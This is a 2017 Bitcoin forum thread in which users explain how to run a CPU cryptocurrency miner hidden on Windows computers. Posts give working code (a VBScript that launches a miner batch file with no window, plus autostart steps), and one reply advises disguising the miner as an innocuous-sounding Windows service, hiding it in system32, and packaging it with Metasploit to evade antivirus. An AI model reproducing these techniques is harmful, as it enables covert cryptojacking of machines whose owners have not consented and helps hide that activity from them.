Bitcoin Forum
April 25, 2024, 01:28:58 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: « 1 [2]  All
  Print  
Author Topic: Miner has to run idle! REWARD IS WAITING FOR YOU  (Read 2171 times)
NeuroticFish
Legendary
*
Offline Offline

Activity: 3654
Merit: 6365


Looking for campaign manager? Contact icopress!


View Profile
April 24, 2017, 09:19:01 AM
 #21

Hi,
I am still looking for the service. No need of any skype id if you can so the job.
I am really not sure if it was you who offered really high price for that. Please correct me if I am wrong.
Sorry for any typo as using my.old phone

I asked of more details since I wanted to know exactly what you want and if the application I made (and use) is good enough for you or need changes (and how big those changes would be).
We didn't discuss at all about any price. The price obviously depends on how much more work I have to do.
I am the one that preferred irc instead of skype.

.
.HUGE.
▄██████████▄▄
▄█████████████████▄
▄█████████████████████▄
▄███████████████████████▄
▄█████████████████████████▄
███████▌██▌▐██▐██▐████▄███
████▐██▐████▌██▌██▌██▌██
█████▀███▀███▀▐██▐██▐█████

▀█████████████████████████▀

▀███████████████████████▀

▀█████████████████████▀

▀█████████████████▀

▀██████████▀▀
█▀▀▀▀











█▄▄▄▄
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
.
CASINSPORTSBOOK
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀▀█











▄▄▄▄█
1714051738
Hero Member
*
Offline Offline

Posts: 1714051738

View Profile Personal Message (Offline)

Ignore
1714051738
Reply with quote  #2

1714051738
Report to moderator
According to NIST and ECRYPT II, the cryptographic algorithms used in Bitcoin are expected to be strong until at least 2030. (After that, it will not be too difficult to transition to different algorithms.)
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
1714051738
Hero Member
*
Offline Offline

Posts: 1714051738

View Profile Personal Message (Offline)

Ignore
1714051738
Reply with quote  #2

1714051738
Report to moderator
1714051738
Hero Member
*
Offline Offline

Posts: 1714051738

View Profile Personal Message (Offline)

Ignore
1714051738
Reply with quote  #2

1714051738
Report to moderator
1714051738
Hero Member
*
Offline Offline

Posts: 1714051738

View Profile Personal Message (Offline)

Ignore
1714051738
Reply with quote  #2

1714051738
Report to moderator
gondel (OP)
Legendary
*
Offline Offline

Activity: 1946
Merit: 1005


View Profile
April 24, 2017, 01:02:14 PM
 #22

hi guys,
So basically I know how to start a process on windows automatically on boot, btu the thing is that I want it to be hidden from the screen, no problem if it can be visible in the task manager.
Best will be if it is a cpu miner.
Thanks
JaredKaragen
Legendary
*
Offline Offline

Activity: 1848
Merit: 1165


My AR-15 ID's itself as a toaster. Want breakfast?


View Profile WWW
April 24, 2017, 10:00:41 PM
Last edit: April 24, 2017, 11:09:20 PM by JaredKaragen
 #23

I have it working flawlessly.  What's the reward?



First, create these files, and leave them all in the same directory:

hider.vbs
Code:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False


miner.bat
Code:
ccminer.exe -a skein -i 17 -o stratum+tcp://skein.mine.zpool.ca:4933 -u 1PHSDYvVp6HpqtuUPocK41DrdeHbbezaeP -p i7-920-GPU,c=BTC,skein,stats


Launchminer.bat
Code:
wscript.exe ".\hider.vbs" ".\miner.bat"

Verify it works.  Cause it does.  All you see is a quick blip of the text window while it launches the script.  The miner batch, and the miner app itself, will both end up in the hidden process container;  and will show up in the task manager as a background process.  Gotta use task manager to close the process.

If you don't want to be launching the initial batch, and instead want to launch just the command, you can do that;  but be sure to make a:  Full:path.to/ the batch file and .vbs script. (I.E. C:/Miner/miner.bat, instead of ./miner.bat)... as well as a Full:path.to/ the miner in the miner launch batch file.

To make auto-run at startup;  the simplest way;  is by the autorun folder in windows 7/8/10, etc..

In newer versions of windows it's hidden in a folder;  "C:/Program Data/Microsoft/Windows/Start Menu/Programs/Run" or something extremely similar.  You need to enable hidden folder viewing, or for instance in windows 10, from the system root drive, type in cd progra~3, and it should be in there via the same hierarchy above if u wanna do it manually via my favorite "copy con" command.

Link to my batch and script resources here.  

DO NOT TRUST YOBIT  -JK

Donations: 1Q8HjG8wMa3hgmDFbFHC9cADPLpm1xKHQM
tarnum
Newbie
*
Offline Offline

Activity: 29
Merit: 0


View Profile
April 24, 2017, 11:02:41 PM
 #24

I have it working flawlessly.  What's the reward?



First, create these files, and leave them all in the same directory:

hider.vbs
Code:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False


miner.bat
Code:
ccminer.exe -a skein -i 17 -o stratum+tcp://skein.mine.zpool.ca:4933 -u 1PHSDYvVp6HpqtuUPocK41DrdeHbbezaeP -p i7-920-GPU,c=BTC,skein,stats


Launchminer.bat
Code:
wscript.exe ".\invisible.vbs" ".\miner.bat"

Verify it works.  Cause it does.  All you see is a quick blip of the text window while it launches the script.  The miner batch, and the miner app itself, will both end up in the hidden process container;  and will show up in the task manager as a background process.  Gotta use task manager to close the process.

If you don't want to be launching the initial batch, and instead want to launch just the command, you can do that;  but be sure to make a:  Full:path.to/ the batch file and .vbs script. (I.E. C:/Miner/miner.bat, instead of ./miner.bat)... as well as a Full:path.to/ the miner in the miner launch batch file.

To make auto-run at startup;  the simplest way;  is by the autorun folder in windows 7/8/10, etc..

In newer versions of windows it's hidden in a folder;  "C:/Program Data/Microsoft/Windows/Start Menu/Programs/Run" or something extremely similar.  You need to enable hidden folder viewing, or for instance in windows 10, from the system root drive, type in cd progra~3, and it should be in there via the same hierarchy above if u wanna do it manually via my favorite "copy con" command.
Sounds good, but "hider.vbs" should be "invisible.vbs" i didnt test this couse i dont need it, but, if you test it and doesnt work, pm me, i have a real solution for you. with PoW.
Wont post it here couse of third party software licenses.
JaredKaragen
Legendary
*
Offline Offline

Activity: 1848
Merit: 1165


My AR-15 ID's itself as a toaster. Want breakfast?


View Profile WWW
April 24, 2017, 11:23:21 PM
 #25

typo corrected.

Thanks =)   forgot to change it both places.

I tested it and it works fine as intended.  Using my manual control batch implementation, I had an instance of ccminer in the background that would automatically restart if you closed it.  Nothing on the UI past the task listed in the task manager as a background/windows process.

Link to my batch and script resources here.  

DO NOT TRUST YOBIT  -JK

Donations: 1Q8HjG8wMa3hgmDFbFHC9cADPLpm1xKHQM
doktor83
Hero Member
*****
Offline Offline

Activity: 2520
Merit: 626


View Profile WWW
April 25, 2017, 05:59:27 AM
 #26

I already sent him a code in vbscript and he can't run it... access denied stuff.. Smiley

SRBMiner-MULTI thread - HERE
http://www.srbminer.com
JaredKaragen
Legendary
*
Offline Offline

Activity: 1848
Merit: 1165


My AR-15 ID's itself as a toaster. Want breakfast?


View Profile WWW
April 25, 2017, 09:14:53 AM
 #27

I already sent him a code in vbscript and he can't run it... access denied stuff.. Smiley
with proper user access on the system, shouldn't be an issue to make this work.

If you are trying to circumvent the basic system authentication and other safeguards for people not running apps that aren't supposed to;  well, that's getting into the behavior and actions of malware and viruses...  Modifying and starting background processes is a malware heuristic; 'tis why it will need administrator priv.... 

so if you wanna do a third party solution to circumvent the systems;  I won't do that part for you...  Tongue  If you know how to access the hidden C$, D$, etc shares;  you should already know how to accomplish it.
This link will explain it better than I did.

Link to my batch and script resources here.  

DO NOT TRUST YOBIT  -JK

Donations: 1Q8HjG8wMa3hgmDFbFHC9cADPLpm1xKHQM
doktor83
Hero Member
*****
Offline Offline

Activity: 2520
Merit: 626


View Profile WWW
April 25, 2017, 10:53:04 AM
 #28

I already sent him a code in vbscript and he can't run it... access denied stuff.. Smiley
with proper user access on the system, shouldn't be an issue to make this work.

If you are trying to circumvent the basic system authentication and other safeguards for people not running apps that aren't supposed to;  well, that's getting into the behavior and actions of malware and viruses...  Modifying and starting background processes is a malware heuristic; 'tis why it will need administrator priv.... 

so if you wanna do a third party solution to circumvent the systems;  I won't do that part for you...  Tongue  If you know how to access the hidden C$, D$, etc shares;  you should already know how to accomplish it.
This link will explain it better than I did.


i don't know what and WHY are you talking about this to me, but OK, suit yourself Cheesy
I just wrote he has some problems with running vbscripts on his machine Cheesy

SRBMiner-MULTI thread - HERE
http://www.srbminer.com
sirslayer
Hero Member
*****
Offline Offline

Activity: 540
Merit: 501


chickens and cryptos


View Profile
April 25, 2017, 07:36:01 PM
 #29

i think he was saying that if he dont have the admin rights from the get go maybe he dont own the pc .. maybe he was looking at advice to hack into it .. 
JaredKaragen
Legendary
*
Offline Offline

Activity: 1848
Merit: 1165


My AR-15 ID's itself as a toaster. Want breakfast?


View Profile WWW
April 26, 2017, 12:33:57 AM
 #30

i think he was saying that if he dont have the admin rights from the get go maybe he dont own the pc .. maybe he was looking at advice to hack into it .. 
Which is what i will not give.

It is a skill to be learned.  Not handed.

Link to my batch and script resources here.  

DO NOT TRUST YOBIT  -JK

Donations: 1Q8HjG8wMa3hgmDFbFHC9cADPLpm1xKHQM
Pseudonim
Newbie
*
Offline Offline

Activity: 3
Merit: 0


View Profile
September 05, 2017, 12:10:58 AM
 #31

hello

How far did you go with this? I'm interesting too. I found this thread:
https://bitcointalk.org/index.php?topic=1939946.0

but it's not working. Plus, I think you can't adjust number of cpu cores, its only work with one or two? Does anyone know is there something similar to this miner, but with more options to adjust?

thanks
NeuroticFish
Legendary
*
Offline Offline

Activity: 3654
Merit: 6365


Looking for campaign manager? Contact icopress!


View Profile
September 07, 2017, 07:28:49 AM
 #32

hello

How far did you go with this? I'm interesting too. I found this thread:
https://bitcointalk.org/index.php?topic=1939946.0

but it's not working. Plus, I think you can't adjust number of cpu cores, its only work with one or two? Does anyone know is there something similar to this miner, but with more options to adjust?

thanks

I made myself a program in c# that runs in tray and starts the (CPU) miner in a similar way like the .bat file would do.
I didn't accept OP's price (counter)offer and he didn't answer anymore, so I don't know what is he using now.

.
.HUGE.
▄██████████▄▄
▄█████████████████▄
▄█████████████████████▄
▄███████████████████████▄
▄█████████████████████████▄
███████▌██▌▐██▐██▐████▄███
████▐██▐████▌██▌██▌██▌██
█████▀███▀███▀▐██▐██▐█████

▀█████████████████████████▀

▀███████████████████████▀

▀█████████████████████▀

▀█████████████████▀

▀██████████▀▀
█▀▀▀▀











█▄▄▄▄
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
.
CASINSPORTSBOOK
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀▀█











▄▄▄▄█
JaredKaragen
Legendary
*
Offline Offline

Activity: 1848
Merit: 1165


My AR-15 ID's itself as a toaster. Want breakfast?


View Profile WWW
September 15, 2017, 01:44:52 AM
 #33

hello

How far did you go with this? I'm interesting too. I found this thread:
https://bitcointalk.org/index.php?topic=1939946.0

but it's not working. Plus, I think you can't adjust number of cpu cores, its only work with one or two? Does anyone know is there something similar to this miner, but with more options to adjust?

thanks

I made myself a program in c# that runs in tray and starts the (CPU) miner in a similar way like the .bat file would do.
I didn't accept OP's price (counter)offer and he didn't answer anymore, so I don't know what is he using now.

IMHO OP wouldn't pay to begin with.

A solution was posted above; and met requirements; and was 100% open source.


Choosing a # of cpu cores to use (even what specific cores) can be done with the miner app's launch string itself.  At one point when I was mining xevan, I would have the process limited to all the free cores, and bound all the system processes that I could to two of the cores....   it seemed to work fine, but it took a long time to find out what setting to use (trial and error) to use the amount of cores in the forced mode I wanted.  Use the cpuminer --cpu-affinity flag, and start with 0x0 and work your way up watching core usage.

Link to my batch and script resources here.  

DO NOT TRUST YOBIT  -JK

Donations: 1Q8HjG8wMa3hgmDFbFHC9cADPLpm1xKHQM
Turkish88
Full Member
***
Offline Offline

Activity: 714
Merit: 104



View Profile
November 18, 2017, 05:06:10 AM
 #34

i can try release the cpu miner, for monero example, wich mine only when computer iddle and when operator move mouse process kills.
what the reward?

Help to Ukrainian citizens
ETH donations adress - 0xe23CB47AC32F0b8750d4D0Dd4e160Fa6F8fF30EF
clems
Member
**
Offline Offline

Activity: 171
Merit: 10


View Profile
November 18, 2017, 08:48:36 AM
 #35

Do you realize you asking how to create a hidden service ?
If all computers are yours so what's the point of hidding the service?

Anyway:
Create the service with a name such  "Microsoft Service Provider" or anything who looks not suspicious.
Add this service as dependencies to another services. (ask google for that)
Put bat and all exe files in c:\windows\system32\

Done.

But if you want something better you have to create your owne (exe files) from the bat file you create, rename miner 'exefile" ..... Metasploit should do the trick.

A yes some antivirus will not really like that Smiley




Ref HiveOS https://hiveos.farm?ref=3665
Promocode HIVEOS: IMPASSENET (10 dollars on your account)
Pages: « 1 [2]  All
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!